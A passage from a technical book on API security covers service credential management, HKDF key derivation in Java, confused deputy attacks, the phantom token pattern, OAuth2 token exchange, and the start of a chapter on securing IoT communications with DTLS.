be used to enforce a separation of duties that allows the private key to be kept securely
away from pods that service user requests. When combined with certificate-bound
access tokens of section 11.4.6, this pattern can result in significantly increased secu-
rity for OAuth2-based microservices.
The main problem with short-lived credentials is that Kubernetes is designed for
highly dynamic environments in which pods come and go, and new service instances
can be created to respond to increased load. The solution is to have a controller process
register with the Kubernetes API server and watch for new pods being created. The con-
troller process can then create a new temporary credential, such as a fresh signed JWT,
and deploy it to the pod before it starts up. The controller process has access to long-
lived credentials but can be deployed in a separate namespace with strict network poli-
cies to reduce the risk of it being compromised, as shown in figure 11.8.
AS
Controller
Kubernetes API
server
New pod
Control plane
Data plane
The Kubernetes API server
informs the controller when
a new pod is created.
The controller uses its private
key to create a short-lived JWT.
The JWT is deployed
to the pod.
The pod exchanges
the JWT for an access
token using the JWT
Bearer grant.
Figure 11.8
A controller process running in a separate control plane
namespace can register with the Kubernetes API to watch for new pods. When
a new pod is created, the controller uses its private key to sign a short-lived
JWT, which it then deploys to the new pod. The pod can then exchange the JWT
for an access token or other long-lived credentials.
425
Managing service credentials
A production-quality implementation of this pattern is available, again for Hashicorp
Vault, as the Boostport Kubernetes-Vault integration project (https://github.com/
Boostport/kubernetes-vault). This controller can inject unique secrets into each pod,
allowing the pod to connect to Vault to retrieve its other secrets. Because the initial
secrets are unique to a pod, they can be restricted to allow only a single use, after
which the token becomes invalid. This ensures that the credential is valid for the
shortest possible time. If an attacker somehow managed to compromise the token
before the pod used it, then the pod will noisily fail to start up when it fails to connect
to Vault, providing a signal to security teams that something unusual has occurred.
11.5.4 Key derivation
A complementary approach to secure distribution of secrets is to reduce the number
of secrets your application needs in the first place. One way to achieve this is to derive
cryptographic keys for different purposes from a single master key, using a key deriva-
tion function (KDF). A KDF takes the master key and a context argument, which is typ-
ically a string, and returns one or more new keys as shown in figure 11.9. A different
context argument results in completely different keys and each key is indistinguish-
able from a completely random key to somebody who doesn’t know the master key,
making them suitable as strong cryptographic keys.
If you recall from chapter 9, macaroons work by treating the HMAC tag of an existing
token as a key when adding a new caveat. This works because HMAC is a secure pseudo-
random function, which means that its outputs appear completely random if you don’t
know the key. This is exactly what we need to build a KDF, and in fact HMAC is used as
the basis for a widely used KDF called HKDF (HMAC-based KDF, https://tools.ietf.org/
html/rfc5869). HKDF consists of two related functions:
HKDF-Extract takes as input a high-entropy input that may not be suitable for
direct use as a cryptographic key and returns a HKDF master key. This function
KDF
Master key
"jwt-enc-key"
Context string
Derived key
A KDF uses a master
key and a context
string as inputs.
Different context
strings produce different
derived keys.
Figure 11.9
A key derivation
function (KDF) takes a master key
and context string as inputs and
produces derived keys as outputs.
You can derive an almost unlimited
number of strong keys from a single
high-entropy master key.
426
CHAPTER 11
Securing service-to-service APIs
is useful in some cryptographic protocols but can be skipped if you already have
a valid HMAC key. You won’t use HKDF-Extract in this book.
HKDF-Expand takes the master key and a context and produces an output key of
any requested size.
DEFINITION
HKDF is a HMAC-based KDF based on an extract-and-expand
method. The expand function can be used on its own to generate keys from a
master HMAC key.
Listing 11.15 shows an implementation of HKDF-Expand using HMAC-SHA-256. To
generate the required amount of output key material, HKDF-Expand performs a
loop. Each iteration of the loop runs HMAC to produce a block of output key material
with the following inputs:
1
The HMAC tag from the last time through the loop unless this is the first loop.
2
The context string.
3
A block counter byte, which starts at 1 and is incremented each time.
With HMAC-SHA-256 each iteration of the loop generates 32 bytes of output key
material, so you’ll typically only need one or two loops to generate a big enough key for
most algorithms. Because the block counter is a single byte, and cannot be 0, you can
only loop a maximum of 255 times, which gives a maximum key size of 8,160 bytes.
Finally, the output key material is converted into a Key object using the javax.crypto
.spec.SecretKeySpec class. Create a new file named HKDF.java in the src/main/
java/com/manning/apisecurityinaction folder with the contents of the file.
TIP
If the master key lives in a HSM or KMS then it is much more efficient to
combine the inputs into a single byte array rather than making multiple calls
to the update() method.
package com.manning.apisecurityinaction;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.security.*;
import static java.nio.charset.StandardCharsets.UTF_8;
import static java.util.Objects.checkIndex;
public class HKDF {
public static Key expand(Key masterKey, String context,
int outputKeySize, String algorithm)
throws GeneralSecurityException {
checkIndex(outputKeySize, 255*32);
var hmac = Mac.getInstance("HmacSHA256");
hmac.init(masterKey);
Listing 11.15
HKDF-Expand
Ensure the
caller didn’t
ask for too
much key
material.
Initialize the Mac
with the master key.
427
Managing service credentials
var output = new byte[outputKeySize];
var block = new byte[0];
for (int i = 0; i < outputKeySize; i += 32) {
hmac.update(block);
hmac.update(context.getBytes(UTF_8));
hmac.update((byte) ((i / 32) + 1));
block = hmac.doFinal();
System.arraycopy(block, 0, output, i,
Math.min(outputKeySize - i, 32));
}
return new SecretKeySpec(output, algorithm);
}
}
You can now use this to generate as many keys as you want from an initial HMAC key.
For example, you can open the Main.java file and replace the code that loads the AES
encryption key from the keystore with the following code that derives it from the
HMAC key instead as shown in the bold line here:
var macKey = keystore.getKey("hmac-key", "changeit".toCharArray());
var encKey = HKDF.expand(macKey, "token-encryption-key",
32, "AES");
WARNING
A cryptographic key should be used for a single purpose. If you use
a HMAC key for key derivation, you should not use it to also sign messages.
You can use HKDF to derive a second HMAC key to use for signing.
You can generate almost any kind of symmetric key using this method, making sure
to use a distinct context string for each different key. Key pairs for public key cryp-
tography generally can’t be generated in this way, as the keys are required to have
some mathematical structure that is not present in a derived random key. However,
the Salty Coffee library used in chapter 6 contains methods for generating key pairs
for public key encryption and for digital signatures from a 32-byte seed, which can
be used as follows:
var seed = HKDF.expand(macKey, "nacl-signing-key-seed",
32, "NaCl");
var keyPair = Crypto.seedSigningKeyPair(seed.getEncoded());
CAUTION
The algorithms used by Salty Coffee, X25519 and Ed25519, are
designed to safely allow this. The same is not true of other algorithms.
Although generating a handful of keys from a master key may not seem like much of a
savings, the real value comes from the ability to generate keys programmatically that
are the same on all servers. For example, you can include the current date in the
context string and automatically derive a fresh encryption key each day without
needing to distribute a new key to every server. If you include the context string in the
Loop until the
requested output size
has been generated.
Include the
output block
of the last
loop in the
new HMAC.
Include the context string and
the current block counter.
Copy the new HMAC
tag to the next block
of output.
Use HKDF to
generate a seed.
Derive a signing
keypair from the seed.
428
CHAPTER 11
Securing service-to-service APIs
encrypted data, for example as the kid header in an encrypted JWT, then you can
quickly re-derive the same key whenever you need without storing previous keys.
11.6
Service API calls in response to user requests
When a service makes an API call to another service in response to a user request, but
uses its own credentials rather than the user’s, there is an opportunity for confused
deputy attacks like those discussed in chapter 9. Because service credentials are often
more privileged than normal users, an attacker may be able to trick the service to per-
forming malicious actions on their behalf.
You can avoid confused deputy attacks in service-to-service calls that are carried
out in response to user requests by ensuring that access control decisions made in
backend services include the context of the original request. The simplest solution is
for frontend services to pass along the username or other identifier of the user that
Facebook CATs
As you might expect, Facebook needs to run many services in production with numer-
ous clients connecting to each service. At the huge scale they are running at, public
key cryptography is deemed too expensive, but they still want to use strong authen-
tication between clients and services. Every request and response between a client
and a service is authenticated with HMAC using a key that is unique to that client-
service pair. These signed HMAC tokens are known as Crypto Auth Tokens, or CATs,
and are a bit like signed JWTs.
To avoid storing, distributing, and managing thousands of keys, Facebook uses key
derivation heavily. A central key distribution service stores a master key. Clients and
services authenticate to the key distribution service to get keys based on their
identity. The key for a service with the name “AuthService” is calculated using
KDF(masterKey, "AuthService"), while the key for a client named “Test” to talk to
the auth service is calculated as KDF(KDF(masterKey, "AuthService"), "Test").
This allows Facebook to quickly generate an almost unlimited number of client and
service keys from the single master key. You can read more about Facebook’s CATs
at https://eprint.iacr.org/2018/413.
Pop quiz
12 Which HKDF function is used to derive keys from a HMAC master key?
a
HKDF-Extract
b
HKDF-Expand
c
HKDF-Extrude
d
HKDF-Exhume
e
HKDF-Exfiltrate
The answer is at the end of the chapter.
429
Service API calls in response to user requests
made the original request. The backend service can then make an access control deci-
sion based on the identity of this user rather than solely on the identity of the calling
service. Service-to-service authentication is used to establish that the request comes
from a trusted source (the frontend service), and permission to perform the action is
determined based on the identity of the user indicated in the request.
TIP
As you’ll recall from chapter 9, capability-based security can be used to
systematically eliminate confused deputy attacks. If the authority to perform
an operation is encapsulated as a capability, this can be passed from the user
to all backend services involved in implementing that operation. The author-
ity to perform an operation comes from the capability rather than the identity
of the service making a request, so an attacker can’t request an operation they
don’t have a capability for.
11.6.1 The phantom token pattern
Although passing the username of the original user is simple and can avoid confused
deputy attacks, a compromised frontend service can easily impersonate any user by sim-
ply including their username in the request. An alternative would be to pass down the
token originally presented by the user, such as an OAuth2 access token or JWT. This
allows backend services to check that the token is valid, but it still has some drawbacks:
If the access token requires introspection to check validity, then a network call
to the AS has to be performed at each microservice that is involved in process-
ing a request. This can add a lot of overhead and additional delays.
On the other hand, backend microservices have no way of knowing if a long-
lived signed token such as a JWT has been revoked without performing an
introspection request.
A compromised microservice can take the user’s token and use it to access other
services, effectively impersonating the user. If service calls cross trust boundaries,
Kubernetes critical API server vulnerability
In 2018, the Kubernetes project itself reported a critical vulnerability allowing this
kind of confused deputy attack (https://rancher.com/blog/2018/2018-12-04-k8s-
cve/). In the attack, a user made an initial request to the Kubernetes API server,
which authenticated the request and applied access control checks. It then made its
own connection to a backend service to fulfill the request. This API request to the
backend service used highly privileged Kubernetes service account credentials, pro-
viding administrator-level access to the entire cluster. The attacker could trick Kuber-
netes into leaving the connection open, allowing the attacker to send their own
commands to the backend service using the service account. The default configura-
tion permitted even unauthenticated users to exploit the vulnerability to execute any
commands on backend servers. To make matters worse, Kubernetes audit logging
filtered out all activity from system accounts so there was no trace that an attack had
taken place.
430
CHAPTER 11
Securing service-to-service APIs
such as when calls are made to external services, the risk of exposing the user’s
token increases.
The first two points can be addressed through an OAuth2 deployment pattern imple-
mented by some API gateways, shown in figure 11.10. In this pattern, users present
long-lived access tokens to the API gateway which performs a token introspection call
to the AS to ensure the token is valid and hasn’t been revoked. The API gateway then
takes the contents of the introspection response, perhaps augmented with additional
information about the user (such as roles or group memberships) and produces a
short-lived JWT signed with a key trusted by all the microservices behind the gateway.
The gateway then forwards the request to the target microservices, replacing the orig-
inal access token with this short-lived JWT. This is sometimes referred to as the phan-
tom token pattern. If a public key signature is used for the JWT then microservices can
validate the token but not create their own.
DEFINITION
In the phantom token pattern, a long-lived opaque access token is
validated and then replaced with a short-lived signed JWT at an API gateway.
Microservices behind the gateway can examine the JWT without needing to
perform an expensive introspection request.
API gateway
AS
Microservice
Microservice
Microservice
Access token
Introspect token
Signed JWT
The API gateway introspects
incoming access tokens
by calling the AS.
The gateway signs a short-lived
JWT with its own private key.
Backend microservices
validate the JWT rather
than calling the AS.
Figure 11.10
In the phantom token pattern, an API gateway introspects
access tokens arriving from external clients. It then replaces the access
token with a short-lived signed JWT containing the same information.
Microservices can then examine the JWT without having to call the AS to
introspect themselves.
431
Service API calls in response to user requests
The advantage of the phantom token pattern is that microservices behind the gateway
don’t need to perform token introspection calls themselves. Because the JWT is short-
lived, typically with an expiry time measured in seconds or minutes at most, there is
no need for those microservices to check for revocation. The API gateway can exam-
ine the request and reduce the scope and audience of the JWT, limiting the damage
that would be done if any backend microservice has been compromised. In principle,
if the gateway needs to call five different microservices to satisfy a request, it can create
five separate JWTs with scope and audience appropriate to each request. This ensures
the principle of least privilege is respected and reduces the risk if any one of those ser-
vices is compromised, but is rarely done due to the extra overhead of creating new
JWTs, especially if public key signatures are used.
TIP
A network roundtrip within the same datacenter takes a minimum of
0.5ms plus the processing time required by the AS (which may involve data-
base network requests). Verifying a public key signature varies from about
1/10th of this time (RSA-2048 using OpenSSL) to roughly 10 times as long
(ECDSA P-521 using Java’s SunEC provider). Verifying a signature also gen-
erally requires more CPU power than making a network call, which may
impact costs.
The phantom token pattern is a neat balance of the benefits and costs of opaque
access tokens compared to self-contained token formats like JWTs. Self-contained
tokens are scalable and avoid extra network roundtrips, but are hard to revoke, while
the opposite is true of opaque tokens.
PRINCIPLE
Prefer using opaque access tokens and token introspection when
tokens cross trust boundaries to ensure timely revocation. Use self-contained
short-lived tokens for service calls within a trust boundary, such as between
microservices.
11.6.2 OAuth2 token exchange
The token exchange extension of OAuth2 (https://www.rfc-editor.org/rfc/rfc8693.html)
provides a standard way for an API gateway or other client to exchange an access
token for a JWT or other security token. As well as allowing the client to request a new
token, the AS may also add an act claim to the resulting token that indicates that the
service client is acting on behalf of the user that is identified as the subject of the
token. A backend service can then identify both the service client and the user that
initiated the request originally from a single access token.
DEFINITION
Token exchange should primarily be used for delegation semantics,
in which one party acts on behalf of another but both are clearly identified. It
can also be used for impersonation, in which the backend service is unable to
tell that another party is impersonating the user. You should prefer delega-
tion whenever possible because impersonation leads to misleading audit logs
and loss of accountability.
432
CHAPTER 11
Securing service-to-service APIs
To request a token exchange, the client makes a HTTP POST request to the AS’s
token endpoint, just as for other authorization grants. The grant_type parameter is
set to urn:ietf:params:oauth:grant-type:token-exchange, and the client passes a
token representing the user’s initial authority as the subject_token parameter, with
a subject_token_type parameter describing the type of token (token exchange allows
a variety of tokens to be used, not just access tokens). The client authenticates to the
token endpoint using its own credentials and can provide several optional parameters
shown in table 11.4. The AS will make an authorization decision based on the sup-
plied information and the identity of the subject and the client and then either return
a new access token or reject the request.
TIP
Although token exchange is primarily intended for service clients, the
actor_token parameter can reference another user. For example, you can
use token exchange to allow administrators to access parts of other users’
accounts without giving them the user’s password. While this can be done, it
has obvious privacy implications for your users.
The requested_token_type attribute allows the client to request a specific type of
token in the response. The value urn:ietf:params:oauth:token-type:access_token
indicates that the client wants an access token, in whatever token format the AS pre-
fers, while urn:ietf:params:oauth:token-type:jwt can be used to request a JWT
specifically. There are other values defined in the specification, permitting the client
to ask for other security token types. In this way, OAuth2 token exchange can be seen
as a limited form of security token service.
DEFINITION
A security token service (STS) is a service that can translate security
tokens from one format to another based on security policies. An STS can be
used to bridge security systems that expect different token formats.
Table 11.4
Token exchange optional parameters
Parameter
Description
resource
The URI of the service that the client intends to access on the user’s
behalf.
audience
The intended audience of the token. This is an alternative to the
resource parameter where the identifier of the target service is
not a URI.
scope
The desired scope of the new access token.
requested_token_type
The type of token the client wants to receive.
actor_token
A token that identifies the party that is acting on behalf of the user.
If not specified, the identity of the client will be used.
actor_token_type
The type of the actor_token parameter.
433
Service API calls in response to user requests
When a backend service introspects the exchanged access token, they may see a
nested chain of act claims, as shown in listing 11.15. As with other access tokens, the
sub claim indicates the user on whose behalf the request is being made. Access con-
trol decisions should always be made primarily based on the user indicated in this
claim. Other claims in the token, such as roles or permissions, will be about that user.
The first act claim indicates the calling service that is acting on behalf of the user. An
act claim is itself a JSON claims set that may contain multiple identity attributes about
the calling service, such as the issuer of its identity, which may be needed to uniquely
identify the service. If the token has passed through multiple services, then there may
be further act claims nested inside the first one, indicating the previous services that
also acted as the same user in servicing the same request. If the backend service wants
to take the service account into consideration when making access control decisions,
it should limit this to just the first (outermost) act identity. Any previous act identities
are intended only for ensuring a complete audit record.
NOTE
Nested act claims don’t indicate that service77 is pretending to be ser-
vice16 pretending to be Alice! Think of it as a mask being passed from actor
to actor, rather than a single actor wearing multiple layers of masks.
{
"aud":"https://service26.example.com",
"iss":"https://issuer.example.com",
"exp":1443904100,
"nbf":1443904000,
"sub":"[email protected]",
"act":
{
"sub":"https://service16.example.com",
"act":
{
"sub":"https://service77.example.com"
}
}
}
Token exchange introduces an additional network roundtrip to the AS to exchange
the access token at each hop of servicing a request. It can therefore be more expen-
sive than the phantom token pattern and introduce additional latency in a microser-
vices architecture. Token exchange is more compelling when service calls cross trust
boundaries and latency is less of a concern. For example, in healthcare, a patient may
enter the healthcare system and be treated by multiple healthcare providers, each of
which needs some level of access to the patient’s records. Token exchange allows one
provider to hand off access to another provider without repeatedly asking the patient
for consent. The AS decides an appropriate level of access for each service based on
configured authorization policies.
Listing 11.16
An exchanged access token introspection response
The effective user
of the token
The service that is acting
on behalf of the user
A previous service that also
acted on behalf of the user
in the same request
434
CHAPTER 11
Securing service-to-service APIs
NOTE
When multiple clients and organizations are granted access to user data
based on a single consent flow, you should ensure that this is indicated to the
user in the initial consent screen so that they can make an informed decision.
Macaroons for service APIs
If the scope or authority of a token only needs to be reduced when calling other ser-
vices, a macaroon-based access token (chapter 9) can be used as an alternative to
token exchange. Recall that a macaroon allows any party to append caveats to the
token, restricting what it can be used for. For example, an initial broad-scoped token
supplied by a user granting access to their patient records can be restricted with
caveats before calling external services, perhaps only to allow access to notes from
the last 24 hours. The advantage is that this can be done locally (and efficiently) with-
out having to call the AS to exchange the token.
A common use of service credentials is for a frontend API to make calls to a backend
database. The frontend API typically has a username and password that it uses to
connect, with privileges to perform a wide range of operations. If instead the data-
base used macaroons for authorization, it could issue a broadly privileged macaroon
to the frontend service. The frontend service can then append caveats to the maca-
roon and reissue it to its own API clients and ultimately to users. For example, it might
append a caveat user = "mary" to a token issued to Mary so that she can only read
her own data, and an expiry time of 5 minutes. These constrained tokens can then
be passed all the way back to the database, which can enforce the caveats. This was
the approach adopted by the Hyperdex database (http://mng.bz/gg1l). Very few data-
bases support macaroons today, but in a microservice architecture you can use the
same techniques to allow more flexible and dynamic access control.
Pop quiz
13 In the phantom token pattern, the original access token is replaced by which one
of the following?
a
A macaron
b
A SAML assertion
c
A short-lived signed JWT
d
An OpenID Connect ID token
e
A token issued by an internal AS
14 In OAuth2 token exchange, which parameter is used to communicate a token
that represents the user on whose behalf the client is operating?
a
The scope parameter
b
The resource parameter
c
The audience parameter
d
The actor_token parameter
e
The subject_token parameter
The answers are at the end of the chapter.
435
Summary
Answers to pop quiz questions
1
d and e. API keys identify services, external organizations, or businesses that
need to call your API. An API key may have a long expiry time or never expire,
while user tokens typically expire after minutes or hours.
2
e.
3
e. Client credentials and service account authentication can use the same mecha-
nisms; the primary benefit of using a service account is that clients are often
stored in a private database that only the AS has access to. Service accounts live
in the same repository as other users and so APIs can query identity details and
role/group memberships.
4
c, d, and e.
5
e. The CertificateRequest message is sent to request client certificate authenti-
cation. If it’s not sent by the server, then the client can’t use a certificate.
6
c. The client signs all previous messages in the handshake with the private key.
This prevents the message being reused for a different handshake.
7
b.
8
f. The only check required is to compare the hash of the certificate. The AS per-
forms all other checks when it issues the access token. While an API can option-
ally implement additional checks, these are not required for security.
9
False. A client can request certificate-bound access tokens even if it uses a differ-
ent client authentication method. Even a public client can request certificate-
bound access tokens.
10
a and d.
11
d.
12
a. HKDF-Expand. HKDF-Extract is used to convert non-uniform input key mate-
rial into a uniformly random master key.
13
c.
14
e.
Summary
API keys are often used to authenticate service-to-service API calls. A signed or
encrypted JWT is an effective API key. When used to authenticate a client, this is
known as JWT bearer authentication.
OAuth2 supports service-to-service API calls through the client credentials grant
type that allows a client to obtain an access token under its own authority.
A more flexible alternative to the client credentials grant is to create service
accounts which act like regular user accounts but are intended for use by services.
Service accounts should be protected with strong authentication mechanisms
because they often have elevated privileges compared to normal accounts.
The JWT bearer grant type can be used to obtain an access token for a service
account using a JWT. This can be used to deploy short-lived JWTs to services
436
CHAPTER 11
Securing service-to-service APIs
when they start up that can then be exchanged for access and refresh tokens.
This avoids leaving long-lived, highly-privileged credentials on disk where they
might be accessed.
TLS client certificates can be used to provide strong authentication of service
clients. Certificate-bound access tokens improve the security of OAuth2 and
prevent token theft and misuse.
Kubernetes includes a simple method for distributing credentials to services,
but it suffers from some security weaknesses. Secret vaults and key management
services provide better security but need an initial credential to access. A short-
lived JWT can provide this initial credential with the least risk.
When service-to-service API calls are made in response to user requests, care
should be taken to avoid confused deputy attacks. To avoid this, the original user
identity should be communicated to backend services. The phantom token pat-
tern provides an efficient way to achieve this in a microservice architecture, while
OAuth2 token exchange and macaroons can be used across trust boundaries.
Part 5
APIs for the
Internet of Things
This final part of the book deals with securing APIs in one of the most chal-
lenging environments: the Internet of Things (IoT). IoT devices are often lim-
ited in processing power, battery life, and other physical characteristics, making
it difficult to apply many of the techniques from earlier in the book. In this part,
you’ll see how to adapt techniques to be more suitable for such constrained
devices.
Chapter 12 begins with a look at the crucial issue of securing communica-
tions between devices and APIs. You’ll see how transport layer security can be
adapted to device communication protocols using DTLS and pre-shared keys.
Securing communications from end to end when requests and responses must
pass over multiple different transport protocols is the focus of the second half of
the chapter.
Chapter 13 concludes the book with a discussion of authentication and
authorization techniques for IoT APIs. It discusses approaches to avoid replay
attacks and other subtle security issues and concludes with a look at handling
authorization when a device is offline.
439
Securing IoT
communications
So far, all the APIs you’ve looked at have been running on servers in the safe con-
fines of a datacenter or server room. It’s easy to take the physical security of the API
hardware for granted, because the datacenter is a secure environment with restricted
access and decent locks on the doors. Often only specially vetted staff are allowed
into the server room to get close to the hardware. Traditionally, even the clients of
an API could be assumed to be reasonably secure because they were desktop PCs
installed in an office environment. This has rapidly changed as first laptops and
then smartphones have moved API clients out of the office environment. The inter-
net of things (IoT) widens the range of environments even further, especially in
industrial or agricultural settings where devices may be deployed in remote envi-
ronments with little physical protection or monitoring. These IoT devices talk to
APIs in messaging services to stream sensor data to the cloud and provide APIs of
This chapter covers
Securing IoT communications with Datagram TLS
Choosing appropriate cryptographic algorithms for
constrained devices
Implementing end-to-end security for IoT APIs
Distributing and managing device keys
440
CHAPTER 12
Securing IoT communications
their own to allow physical actions to be taken, such as adjusting machinery in a water
treatment plant or turning off the lights in your home or office. In this chapter, you’ll
see how to secure the communications of IoT devices when talking to each other and
to APIs in the cloud. In chapter 13, we’ll discuss how to secure APIs provided by
devices themselves.
DEFINITION
The internet of things (IoT) is the trend for devices to be connected
to the internet to allow easier management and communication. Consumer IoT
refers to personal devices in the home being connected to the internet, such
as a refrigerator that automatically orders more beer when you run low. IoT
techniques are also applied in industry under the name industrial IoT (IIoT).
12.1
Transport layer security
In a traditional API environment, securing the communications between a client and
a server is almost always based on TLS. The TLS connection between the two parties is
likely to be end-to-end (or near enough) and using strong authentication and encryp-
tion algorithms. For example, a client making a request to a REST API can make a
HTTPS connection directly to that API and then largely assume that the connection is
secure. Even when the connection passes through one or more proxies, these typically
just set up the connection and then copy encrypted bytes from one socket to another.
In the IoT world, things are more complicated for many reasons:
The IoT device may be constrained, reducing its ability to execute the public key
cryptography used in TLS. For example, the device may have limited CPU
power and memory, or may be operating purely on battery power that it needs
to conserve.
For efficiency, devices often use compact binary formats and low-level network-
ing based on UDP rather than high-level TCP-based protocols such as HTTP
and TLS.
A variety of protocols may be used to transmit a single message from a device to
its destination, from short-range wireless protocols such as Bluetooth Low
Energy (BLE) or Zigbee, to messaging protocols like MQTT or XMPP. Gateway
devices can translate messages from one protocol to another, as shown in fig-
ure 12.1, but need to decrypt the protocol messages to do so. This prevents a
simple end-to-end TLS connection being used.
Some commonly used cryptographic algorithms are difficult to implement
securely or efficiently on devices due to hardware constraints or new threats
from physical attackers that are less applicable to server-side APIs.
DEFINITION
A constrained device has significantly reduced CPU power, mem-
ory, connectivity, or energy availability compared to a server or traditional
API client machine. For example, the memory available to a device may be
measured in kilobytes compared to the gigabytes often now available to most
servers and even smartphones. RFC 7228 (https://tools.ietf.org/html/rfc7228)
describes common ways that devices are constrained.
441
Transport layer security
In this section, you’ll learn about how to secure IoT communications at the transport
layer and the appropriate choice of algorithms for constrained devices.
TIP
There are several TLS libraries that are explicitly designed for IoT appli-
cations, such as ARM’s mbedTLS (https://tls.mbed.org), WolfSSL (https://www
.wolfssl.com), and BearSSL (https://bearssl.org).
12.1.1 Datagram TLS
TLS is designed to secure traffic sent over TCP (Transmission Control Protocol),
which is a reliable stream-oriented protocol. Most application protocols in common
use, such as HTTP, LDAP, or SMTP (email), all use TCP and so can use TLS to secure
the connection. But a TCP implementation has some downsides when used in con-
strained IoT devices, such as the following:
A TCP implementation is complex and requires a lot of code to implement cor-
rectly. This code takes up precious space on the device, reducing the amount of
code available to implement other functions.
TCP’s reliability features require the sending device to buffer messages until
they have been acknowledged by the receiver, which increases storage require-
ments. Many IoT sensors produce continuous streams of real-time data, for
which it doesn’t make sense to retransmit lost messages because more recent
data will already have replaced it.
A standard TCP header is at least 16 bytes long, which can add quite a lot of
overhead to short messages.
TCP is unable to use features such as multicast delivery that allow a single mes-
sage to be sent to many devices at once. Multicast can be much more efficient
than sending messages to each device individually.
Sensor
Gateway
Gateway
Cloud
service
BLE
MQTT
HTTP
The sensor broadcasts data
to a local gateway over
Bluetooth Low-Energy (BLE).
Gateways convert messages from
one protocol to another.
Figure 12.1
Messages from IoT
devices are often translated from one
protocol to another. The original device
may use low-power wireless networking
such as Bluetooth Low-Energy (BLE) to
communicate with a local gateway that
retransmits messages using application
protocols such as MQTT or HTTP.
442
CHAPTER 12
Securing IoT communications
IoT devices often put themselves into sleep mode to preserve battery power
when not in use. This causes TCP connections to terminate and requires an
expensive TCP handshake to be performed to re-establish the connection when
the device wakes. Alternatively, the device can periodically send keep-alive mes-
sages to keep the connection open, at the cost of increased battery and band-
width usage.
Many protocols used in the IoT instead opt to build on top of the lower-level User
Datagram Protocol (UDP), which is much simpler than TCP but provides only con-
nectionless and unreliable delivery of messages. For example, the Constrained Applica-
tion Protocol (CoAP), provides an alternative to HTTP for constrained devices and is
based on UDP. To protect these protocols, a variation of TLS known as Datagram TLS
(DTLS) has been developed.1
DEFINITION
Datagram Transport Layer Security (DTLS) is a version of TLS
designed to work with connectionless UDP-based protocols rather than TCP-
based ones. It provides the same protections as TLS, except that packets may
be reordered or replayed without detection.
Recent DTLS versions correspond to TLS versions; for example, DTLS 1.2 corre-
sponds to TLS 1.2 and supports similar cipher suites and extensions. At the time of
writing, DTLS 1.3 is just being finalized, which corresponds to the recently standard-
ized TLS 1.3.
1 DTLS is limited to securing unicast UDP connections and can’t secure multicast broadcasts currently.
QUIC
A middle ground between TCP and UDP is provided by Google’s QUIC protocol (Quick
UDP Internet Connections; https://en.wikipedia.org/wiki/QUIC), which will form the
basis of the next version of HTTP: HTTP/3. QUIC layers on top of UDP but provides
many of the same reliability and congestion control features as TCP. A key feature of
QUIC is that it integrates TLS 1.3 directly into the transport protocol, reducing the
overhead of the TLS handshake and ensuring that low-level protocol features also
benefit from security protections. Google has already deployed QUIC into production,
and around 7% of Internet traffic now uses the protocol.
QUIC was originally designed to accelerate Google’s traditional web server HTTPS
traffic, so compact code size was not a primary objective. However, the protocol can
offer significant advantages to IoT devices in terms of reduced network usage and
low-latency connections. Early experiments such as an analysis from Santa Clara Uni-
versity (http://mng.bz/X0WG) and another by NetApp (https://eggert.org/papers/
2020-ndss-quic-iot.pdf) suggest that QUIC can provide significant savings in an IoT
context, but the protocol has not yet been published as a final standard. Although not
yet achieving widespread adoption in IoT applications, it’s likely that QUIC will
become increasingly important over the next few years.
443
Transport layer security
Although Java supports DTLS, it only does so in the form of the low-level SSLEngine
class, which implements the raw protocol state machine. There is no equivalent of the
high-level SSLSocket class that is used by normal (TCP-based) TLS, so you must do
some of the work yourself. Libraries for higher-level protocols such as CoAP will
handle much of this for you, but because there are so many protocols used in IoT
applications, in the next few sections you’ll learn how to manually add DTLS to a
UDP-based protocol.
NOTE
The code examples in this chapter continue to use Java for consis-
tency. Although Java is a popular choice on more capable IoT devices and
gateways, programming constrained devices is more often performed in C
or another language with low-level device support. The advice on secure
configuration of DTLS and other protocols in this chapter is applicable to
all languages and DTLS libraries. Skip ahead to section 12.1.2 if you are not
using Java.
IMPLEMENTING A DTLS CLIENT
To begin a DTLS handshake in Java, you first create an SSLContext object, which indi-
cates how to authenticate the connection. For a client connection, you initialize the
context exactly like you did in section 7.4.2 when securing the connection to an
OAuth2 authorization server, as shown in listing 12.1. First, obtain an SSLContext for
DTLS by calling SSLContext.getInstance("DTLS"). This will return a context that
allows DTLS connections with any supported protocol version (DTLS 1.0 and DTLS
1.2 in Java 11). You can then load the certificates of trusted certificate authorities
(CAs) and use this to initialize a TrustManagerFactory, just as you’ve done in previ-
ous chapters. The TrustManagerFactory will be used by Java to determine if the
server’s certificate is trusted. In this, case you can use the as.example.com.ca.p12 file
that you created in chapter 7 containing the mkcert CA certificate. The PKIX (Public
Key Infrastructure with X.509) trust manager factory algorithm should be used. Finally,
you can initialize the SSLContext object, passing in the trust managers from the factory,
using the SSLContext.init() method. This method takes three arguments:
An array of KeyManager objects, which are used if performing client certificate
authentication (covered in chapter 11). Because this example doesn’t use client
certificates, you can leave this null.
The array of TrustManager objects obtained from the TrustManagerFactory.
An optional SecureRandom object to use when generating random key material
and other data during the TLS handshake. You can leave this null in most cases
to let Java choose a sensible default.
Create a new file named DtlsClient.java in the src/main/com/manning/apisecurity-
inaction folder and type in the contents of the listing.
NOTE
The examples in this section assume you are familiar with UDP net-
work programming in Java. See http://mng.bz/yr4G for an introduction.
444
CHAPTER 12
Securing IoT communications
package com.manning.apisecurityinaction;
import javax.net.ssl.*;
import java.io.FileInputStream;
import java.nio.file.*;
import java.security.KeyStore;
import org.slf4j.*;
import static java.nio.charset.StandardCharsets.UTF_8;
public class DtlsClient {
private static final Logger logger =
LoggerFactory.getLogger(DtlsClient.class);
private static SSLContext getClientContext() throws Exception {
var sslContext = SSLContext.getInstance("DTLS");
var trustStore = KeyStore.getInstance("PKCS12");
trustStore.load(new FileInputStream("as.example.com.ca.p12"),
"changeit".toCharArray());
var trustManagerFactory = TrustManagerFactory.getInstance(
"PKIX");
trustManagerFactory.init(trustStore);
sslContext.init(null, trustManagerFactory.getTrustManagers(),
null);
return sslContext;
}
}
After you’ve created the SSLContext, you can use the createEngine() method on it
to create a new SSLEngine object. This is the low-level protocol implementation that is
normally hidden by higher-level protocol libraries like the HttpClient class you used
in chapter 7. For a client, you should pass the address and port of the server to the
method when creating the engine and configure the engine to perform the client side
of the DTLS handshake by calling setUseClientMode(true), as shown in the follow-
ing example.
NOTE
You don’t need to type in this example (and the other SSLEngine
examples), because I have provided a wrapper class that hides some of this
complexity and demonstrates correct use of the SSLEngine. See http://mng
.bz/Mo27. You’ll use that class in the example client and server shortly.
